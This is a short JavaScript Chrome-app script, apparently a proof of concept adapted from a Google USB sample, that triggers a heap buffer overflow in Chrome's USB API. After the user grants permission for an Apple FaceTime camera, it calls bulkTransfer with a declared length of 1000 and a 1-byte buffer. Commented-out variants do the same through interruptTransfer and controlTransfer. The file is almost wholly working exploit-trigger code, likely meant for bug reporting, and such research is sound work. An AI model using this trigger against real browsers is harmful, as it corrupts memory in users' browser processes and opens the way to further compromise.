// Original at 
// https://github.com/GoogleChrome/chrome-app-samples/tree/master/usb/knob
DEVICE_INFO = {
  "vendorId": 1452,   //0x05ac: apple
  "productId": 34064 // 0x8510: facetime camera
};
var knob = document.getElementById('knob');
var requestButton = document.getElementById("requestPermission");
var gotPermission = function(result) {
  chrome.usb.findDevices(DEVICE_INFO,
    function(devices) {
      if (!devices || !devices.length) {
        return;
      }
      var device = devices[0];
      chrome.usb.bulkTransfer(device, {
        "direction":"in",
        "endpoint":0,
        "length":1000,            // size in CreateBufferForTransfer
        "data":new ArrayBuffer(1) // input.data in CreateBufferForTransfer
        }, function() {}
      ); // heap buffer overflow
      
      // OR:
      /*
      console.log("interruptTransfer");
      chrome.usb.interruptTransfer(device, {
        "direction":"in",
        "endpoint":0,
        "length":1000,            // size in CreateBufferForTransfer
        "data":new ArrayBuffer(1) // input.data in CreateBufferForTransfer
        }, function() {}
      ); // heap buffer overflow
      */
      // OR:
      /*
      var controlTransferInfo = {
        "index": 0,
        "direction": "in",
        "requestType": "standard",
        "recipient": "device",
        "request": 0,
        "value": 0,
        "data": new ArrayBuffer(1), // input.data in CreateBufferForTransfer
        "length": 1000              // size in CreateBufferForTransfer
      }
      chrome.usb.controlTransfer(device, controlTransferInfo, function(){});
      */
  });
};

var perm = {permissions: [{'usbDevices': [DEVICE_INFO] }]};
requestButton.addEventListener('click', function() {
  chrome.permissions.request(perm, function(result) {
    if (result) {
      gotPermission();
    } else {
      console.log('App was not granted the "usbDevices" permission.');
      console.log(chrome.runtime.lastError);
    }
  });
});
chrome.permissions.contains(perm, function(result) {
  if (result) {
    gotPermission();
  }
});